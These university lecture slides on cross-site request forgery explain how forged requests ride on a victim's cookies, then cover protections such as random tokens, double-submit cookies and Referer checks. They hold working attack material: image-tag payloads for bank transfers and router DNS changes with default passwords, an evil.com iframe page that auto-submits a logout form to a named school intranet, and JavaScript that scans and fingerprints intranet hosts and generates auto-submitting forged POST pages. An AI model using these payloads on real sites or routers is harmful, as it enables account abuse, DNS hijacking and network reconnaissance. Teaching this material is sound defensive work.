Cross Site Request Forgery - CSRF
Emmanuel Benoist, Fall Term 2019/2020
Berner Fachhochschule | Haute ecole specialisee bernoise | Berne University of Applied Sciences
Table of Contents
Cross Site Request Forgery
  Widespread vulnerability
  Vulnerability?
Attacks using CSRF
  Means to reach victims
  Intranet as natural victim
  Combination XSS and CSRF
Examples of attack
  Attack: intranet from inside
Protection that does not work
  Accepting POST only
Protection
  Custom token
  CSRF prevention without a synchronizer token
Cross Site Request Forgery
Not a new attack, but simple and devastating
A CSRF attack forces a logged-on victim's browser to send a request to a vulnerable web application
Target: perform an action chosen by the attacker, on behalf of the victim and with the victim's rights
Sending a request without the consent of the victim?
Insert an image in a HTML file
<img src="http://www.benoist.ch/image/test.gif">
Browser: Downloads an image
GET /image/test.gif HTTP/1.1
...
An image can be generated by a PHP program (or any program)
<img src="http://www.benoist.ch/image/test.php">
Browser: Downloads an image
Sending a request? (Cont.)
An image can be generated according to some parameters
<img src="/barcode.php?number=12345678901">
Browser: Downloads an image
An image tag can point at something that is not an image at all
<img src="http://www.benoist.ch/index.php?action=logout">
Browser: sends GET /index.php?action=logout to www.benoist.ch, together with every cookie it holds for that site; if the victim is logged in, the victim is logged out without having clicked anything
Widespread vulnerability
Touches any web application that
has no authorization checks for vulnerable actions
will process an action if a default login can be given in the request
<img src="http://www.benoist.ch/doSomething?user=admin&pwd=admin">
authorizes requests based only on credentials that are automatically submitted:
  cookies, if the user is currently logged into the application,
  or "remember me" functionality, if the user is not logged in,
  or a Kerberos token, if the machine is part of an intranet participating in integrated logon with Active Directory
State of the art
Most web applications rely solely on automatically submitted credentials:
cookies, basic authentication credentials, source IP addresses, SSL client certificates, or Windows domain credentials
The vulnerability is also known as Session Riding, One-Click Attack, Cross Site Reference Forgery, Hostile Linking and Automation Attack; the acronym XSRF is used alongside CSRF
Vulnerability
A typical CSRF attack directs the victim's browser to invoke some function,
for instance the application's logout page
The following tag can be inserted in any page viewed by the victim:
<img src="http://www.benoist.ch/logout.php">
It generates the same request as clicking on a link containing this address!
Example: online banking transfer
<img src="http://www.mybank.de/transfer.do?fromAccount=document.form.frmAcct&toAccount=4567890&amount=3434.43">
This could transfer money from the victim's account to an account chosen by the attacker (the fromAccount value shown is a placeholder; a real attack fills in the victim's account number, or relies on the server taking it from the session)
Attacks using CSRF
Means to reach victims
How such a link could reach a victim
The web-site owner embedded JavaScript malware in the page
The web page was defaced with embedded JavaScript malware
JavaScript malware was injected into a public area of a website (persistent XSS)
The victim clicked on a specially crafted link, causing the website to echo JavaScript malware (non-persistent XSS)
Intranet as natural victim
CSRF gives access to the intranet
The requests are sent from inside the intranet: they do not have to pass through the firewall, because the victim's browser is already behind it
CSRF combined with JavaScript allows many requests to be sent one after the other:
JavaScript adds an image to the DOM (possibly invisible); when that request has been sent, another image is added, and so on
The Internet side is protected, but the intranet?
You would never dare to do this on the Internet! But what about the intranet?
Leaving hosts unpatched: servers are patched regularly, but local PCs?
Using default passwords: what is the use of changing the password, if the address 192.168.x.y can only be reached from inside my network?
Not putting a firewall in front of a host
Everything seems OK, because the perimeter firewall blocks external access
So CSRF attacks can be very fruitful
Why do CSRF attacks work?
The user's authorization credential is automatically included in any request by the browser
Typically: the session cookie
The attacker does not need to supply that credential: it belongs to the victim's browser
The success of CSRF depends on the probability that the victim is logged in to the attacked system
Idea: attack the site the victim is visiting. Means: XSS
Combination XSS and CSRF
CSRF and XSS
Combining CSRF and XSS: the tag is posted inside the vulnerable application itself
The combination increases the risk: the probability of finding a logged-in user is higher
CSRF does not require XSS: one site can attack another
Any application with XSS flaws is also susceptible to CSRF: a CSRF attack can exploit the XSS flaw to read any credential that is not submitted automatically (an anti-CSRF token in a hidden field, for instance)
When building defenses against CSRF attacks, you must eliminate XSS vulnerabilities
Examples of attack
Attack: intranet from inside
Jeremiah Grossman[1] succeeded in making changes in victims' DSL routers
Even if the user does not know that his router can be configured ;-)
He used the router's default account name and password to perform his attack. Example:
<img src="http://admin:<default-password>@192.168.1.1/">
Then you just have to reconfigure the system:
<img src="http://192.168.1.1/changeDNS?newDNS=143.23.45.1">
Once the DNS server has been changed, the attacker answers every name lookup: the user can no longer be sure that any site he visits is the real one
[1] Talk at BlackHat 2006: "Hacking Intranet Sites from the Outside"
Details of the attack[2]
JavaScript port scanning:
<script src="http://192.168.1.100/"></script>
If a web server is listening, HTML is returned instead of script, causing a JavaScript interpreter error (reported through window.onerror); if nothing answers, the element's own onerror handler fires. Solution: capture the error! (<script ... onerror="myfunction()">)
JavaScript can loop over all the possible IP addresses of nearby hosts: scanning of the hosts
[2] Hacking Intranet Sites from the Outside, Jeremiah Grossman
Details of the attack (Cont.)
Recognizing the server: use a URL that is unique for each server type
Apache web server: /icons/apache_pb.gif
HP printer: /hp/device/hp_invent_logo.gif
PHP image Easter egg: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
Cycle through the unique URLs using Image DOM objects:
<img src="http://192.168.1.100/unique_image_url" onerror="fingerprint()" />
If the onerror event does NOT execute (the image loaded), the host runs the associated platform!
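The scan-and-fingerprint loop of the last two slides, written out as an added example; this is not code from the slides or from Grossman's talk. The three fingerprint paths are the ones listed above; the address range, the outcome map and the probeWithImages helper are assumptions for illustration. buildProbes and classify are plain functions; probeWithImages needs a browser. Modern browsers increasingly refuse subresource requests from a public page to private addresses (Chrome's Private Network Access), so the technique is far less reliable today than it was in 2006.

```javascript
// Added example: intranet fingerprinting with Image DOM objects (not from the slides).
// Fingerprint table: platform -> a path that only that platform serves (paths from the slides).
const FINGERPRINTS = {
  'Apache httpd': '/icons/apache_pb.gif',
  'HP printer': '/hp/device/hp_invent_logo.gif',
  'PHP': '/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42',
};

// Build one probe per (host, platform) for the hosts prefix.from .. prefix.to.
// The address range is constructed for the example.
function buildProbes(prefix, from, to, table = FINGERPRINTS) {
  const probes = [];
  for (let i = from; i <= to; i++) {
    for (const [platform, path] of Object.entries(table)) {
      const host = `${prefix}.${i}`;
      probes.push({ host, platform, url: `http://${host}${path}` });
    }
  }
  return probes;
}

// outcomes: url -> 'load' | 'error' | 'timeout', as reported by the Image objects.
// Only a 'load' is conclusive: the platform-specific file exists, so the host
// runs that platform (the slide's "onerror did NOT execute"). An error or a
// timeout says nothing definite: host down, other platform, or request blocked.
function classify(probes, outcomes) {
  const found = {};
  for (const p of probes) {
    if (outcomes[p.url] === 'load') {
      if (!found[p.host]) found[p.host] = [];
      found[p.host].push(p.platform);
    }
  }
  return found;
}

// Browser side: issue the probes with Image objects, the way the slide's
// <img onerror=...> does, but from script so a whole range is covered.
// Resolves with the outcome map once every probe has reported or timed out.
function probeWithImages(probes, timeoutMs = 3000) {
  return new Promise((resolve) => {
    const outcomes = {};
    let pending = probes.length;
    if (pending === 0) resolve(outcomes);
    const report = (url, result) => {
      if (url in outcomes) return;           // first event wins
      outcomes[url] = result;
      if (--pending === 0) resolve(outcomes);
    };
    for (const p of probes) {
      const img = new Image();               // never displayed: no DOM insertion needed
      img.onload = () => report(p.url, 'load');
      img.onerror = () => report(p.url, 'error');
      setTimeout(() => report(p.url, 'timeout'), timeoutMs);
      img.src = p.url;
    }
  });
}

// In a page: const ps = buildProbes('192.168.1', 1, 254);
//            probeWithImages(ps).then(o => console.log(classify(ps, o)));
```

The separation between probing and classification is deliberate: the load/error events are all an image gives you, and the interpretation (only a successful load proves anything) is where the logic lives.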
Details of the attack (Cont.): login
If the victim is already authenticated to the device: nothing to do, access is automatic
If not: http://admin:<default-password>@192.168.1.1/
Execute the command: suppose we have the following POST form
<form action="changePwd.php" method="POST">
  new password <input type="password" name="newpwd">
  retype new password <input type="password" name="newpwd2">
  <input type="submit" value="send">
</form>
If the server does not distinguish GET from POST parameters (PHP's $_REQUEST does not), we can forge a URL (GET) faking this POST form:
<img src="changePwd.php?newpwd=Toto&newpwd2=Toto">
It is also possible to generate a POST request using JavaScript
Possible targets in a LAN (intranet)
Web-enabled devices: printers, webcams, VoIP phones, WLAN access points, switches, ADSL routers, etc.
Attack on the router: change the configuration password, update the DNS server => man-in-the-middle attack
Protection that does not work
Accepting POST only
Solution: only accept POST requests
Since GET requests are easy to generate: they require only an <img> or <script> tag, which generates a valid GET request that can contain all the required parameters
Idea: block any GET request and accept only POST requests, so that the easy tags do not work any more
DOES NOT WORK!
POST requests can be generated just as well (a form submitted by JavaScript), and they carry the automatic credentials too. The protection is useless!
Attack on a page using a POST form
We take the logout of the school intranet web site as the target action
The logout is done using a form; the button on the form sends a POST request
Source of https://intranet.ti.bfh.ch/index.php?id=4117&L=1:
<form action="index.php?id=4117&L=1" target="_top" method="post" style="margin: 0 0 0 0;">
<table border="0">
<tr>
<td><p class="tx-newloginbox-pi1-username">Nom d utilisateur:</p></td>
<td><p><strong>bie1</strong>, Benoist</p></td>
</tr>
<tr>
<td></td>
<td><input type="submit" name="submit"
id="tx-newloginbox-pi1-logout_submit"
value="Deconnexion"
class="tx-newloginbox-pi1-submit" />
<input type="hidden" name="logintype" value="logout" />
<input type="hidden" name="pid" value="4119" />
</td>
</tr>
</table>
</form>
Principles of the attack
The user visits another page, say www.evil.com/mypage.html
It can be any page on the web
The page contains an invisible iframe, whose content cannot be seen; the iframe contains a page from the web site evil.com
The JavaScript on mypage.html can communicate with the iframe: both come from the same site, so the same-origin policy allows it
The iframe contains the same form as the school logout page
JavaScript forces the iframe to submit the form to the school site
The main page
Source for www.evil.com/mypage.html[3]
<h2>Logout out of the intranet of the School</h2>
<iframe id="testIFrameLogout" src="iFrameLogout.html"></iframe>
<br />
<button onclick="document.getElementById('testIFrameLogout').contentWindow.submitForm()">
Submit form
</button>
[3] In a real attack, submitForm() is executed automatically, without any button
iFrame content
Source for www.evil.com/iFrameLogout.html
<h1>Test For Logout</h1>
<form id="foo" action="https://intranet.ti.bfh.ch/index.php?id=4117" method="POST">
  <input type="submit" name="submit2" id="tx-newloginbox-pi1-logout_submit" value="Deconnexion" class="tx-newloginbox-pi1-submit" />
  <input type="hidden" name="logintype" value="logout" />
  <input type="hidden" name="pid" value="4119" />
</form>
<script>
// called by the parent page through contentWindow.submitForm()
function submitForm() { document.getElementById('foo').submit(); }
</script>
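The automated form of the attack the footnote mentions, as an added example that is not code from the slides: a generator for the attacker's page, with a hidden form mirroring the target's own fields and submitted by script on load. The target URL and field names are copied from the intranet logout form above; the generator itself, its escaping helper and the page layout are assumptions for illustration.

```javascript
// Added example (not from the slides): the attacker's page for a POST-based
// CSRF, generated from the fields of the target's own form.

// Escape a value for use inside a double-quoted HTML attribute, so field
// values containing quotes or angle brackets cannot break the generated form.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Build a complete page: a hidden form with the same action and fields as the
// target form, submitted as soon as the page is parsed. The victim's browser
// attaches its cookies for `action` on its own; this page never sees them.
function forgedPostPage(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`)
    .join('\n');
  return [
    '<!doctype html>',
    '<html><body>',
    `  <form id="csrf" action="${escapeAttr(action)}" method="POST" style="display:none">`,
    inputs,
    '  </form>',
    "  <script>document.getElementById('csrf').submit();</script>",
    '</body></html>',
  ].join('\n');
}

// The logout form of the slides: target URL and field names/values copied from it
// (the submit button is sent as an ordinary field, as the browser would do).
const LOGOUT_TARGET = 'https://intranet.ti.bfh.ch/index.php?id=4117';
const LOGOUT_FIELDS = { submit: 'Deconnexion', logintype: 'logout', pid: '4119' };

// forgedPostPage(LOGOUT_TARGET, LOGOUT_FIELDS) is the page the victim is lured to.
```

Everything the generator needs is visible in the target's HTML; the one field it could not produce is a random per-session token, which is exactly what the protection slides add.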
Protection
Custom token
Applications must ensure that they are not relying only on credentials or tokens that are automatically submitted by browsers:
session cookies, certificates, "remember me" cookies, ...
The application should use a custom token that the browser will not "remember",
so that it cannot be included in the requests the browser sends automatically
Strategies
Ensure that there are no XSS vulnerabilities in your application.
Otherwise any protection is useless, since injected JavaScript could read the hidden token.
Insert custom random tokens into every form (and, with the caveats of the "Protect your token" slides, into URLs). They are not submitted automatically by the browser. Example:
<form action="/transfer.do" method="POST">
  <input type="hidden" name="383838" value="1234323433">
  ...
</form>
Then the server has to verify that token on every state-changing request; the value must be unpredictable, i.e. produced by a cryptographic random generator.
The token can be unique per session, or even per page. The more focused the token, the higher the security, but the application is then much more complicated to write.
Strategies (Cont.)
For sensitive data or value transactions, re-authenticate the user or use transaction signing to ensure that the request is genuine
Set up an external mechanism to verify requests (phone, e-mail); notify the user of the request by e-mail
Do not use GET requests for sensitive data or to perform value transactions; use only POST methods when processing sensitive data from the user
The URL may also carry the random token: this creates a unique URL, which makes CSRF almost impossible to perform, at the price of exposing the token (next slides)
POST alone is an insufficient protection: you must combine it with random tokens
Protect your token
Disclosure of the token in URLs: if you include the token in GET requests (i.e. in the URL), it mitigates CSRF, but the unique per-session token is exposed
URLs are exposed in the browser history, in HTTP log files, in network appliances logging the first line of HTTP requests, and in the Referer header transferred to third parties
A third party who knows the token: CSRF becomes trivial to launch, the attack can be targeted effectively (the Referer shows that the user is visiting the site), and it can run entirely in JavaScript; a single JavaScript call in the page is enough
Protect your token (Cont.)
Prevention: browsers omit the Referer when an HTTPS page links to an HTTP one, so an HTTPS-only web site leaks less (a Referrer-Policy header such as same-origin stops the URL from being sent to other sites at all). Or use only POST methods for sensitive actions, and do not include the CSRF token in GET requests
Double submit cookies
Send a random value in both a cookie and a request parameter
The value is stored as a cookie and included as a hidden parameter in all forms; there is no need to store the value on the server
The server verifies: cookie value = value received in the form
The attacker can modify the form parameter, but can neither read nor modify the cookie (this holds only as long as no attacker-controlled subdomain or plain-HTTP page of the site can set cookies for it: a cookie injected from a sibling subdomain defeats the naive version, so the cookie value should be signed or bound to the session)
The attacker cannot submit two matching elements at the same time
Solution adopted by the Java library Direct Web Remoting (DWR)
Encrypted token pattern
The server generates a token, placed in all forms as a hidden field and not stored on the server
The token contains the user's ID, a timestamp and a nonce, encrypted with a symmetric key known only to the server (use an authenticated mode such as AES-GCM, so that a modified token is rejected outright)
The token is included in all requests: AJAX requests send it in the URL or a header, non-AJAX requests as a hidden field
On receipt of the token, the server decrypts it and checks the values stored in it: the user's ID (must be the logged-in user) and the timestamp (against replay attacks)
CSRF prevention without a synchronizer token
Checking the Referer header
It is trivial to spoof the Referer header,
but only in your own browser; it is impossible to do so in a CSRF attack, since the victim's browser sets it
This check is commonly used for unauthenticated requests (before login), where there is no session in which to store a token
Weak protection against CSRF: open redirect vulnerabilities on the trusted site can be used to exploit GET-based requests with a valid Referer, and some organisations (or browsers) remove the Referer from requests (privacy protection)
Common implementation mistakes: if the attack originates from an HTTPS page (and the target is HTTP), the Referer is omitted; a missing Referer must therefore be treated as an attack, at least for state-changing functions
The Referer can be lightly manipulated: if the victim site is site.com, the attacker can send requests from site.com.attacker.com, which fools naive substring tests
Challenge-Response
CAPTCHA: generate an image and verify that a human sees and interprets it; this cannot be automated in a CSRF attack
Re-authentication (password): necessary for very sensitive actions, such as changing the password; very user-unfriendly
One-time token: the token is changed with each request
Mitigating risks from the user's point of view
Log off immediately after using a web application
Do not allow the browser to save usernames/passwords
Do not use the same browser to access sensitive applications and to surf the Internet; beware of tabbed browsing, where all tabs share the same session
Plugins like "NoScript" make POST-based CSRF difficult to exploit: JavaScript is used to submit the form automatically when the exploit is loaded; without JavaScript, the attacker must trick the user into doing so manually
Conclusion
Cross Site Request Forgery - CSRF exploits the trust a site has in a user, by forging the enactor and making a request appear to come from a trusted user[4]
The server receives requests from the user's browser and thinks they were sent on purpose
[4] Wikipedia
References
OWASP Top 10 - 2010: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
A Guide for Building Secure Web Applications and Web Services: http://www.owasp.org/index.php/Category:OWASP_Guide_Project
Hacking Intranet Sites from the Outside, Jeremiah Grossman, BlackHat 2006: http://www.whitehatsec.com/presentations/whitehat_bh_pres_08032006.tar.gz
RSnake, "What is CSRF?": http://ha.ckers.org/blog/20061030/what-is-csrf/
OWASP CSRF Prevention Cheat Sheet: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet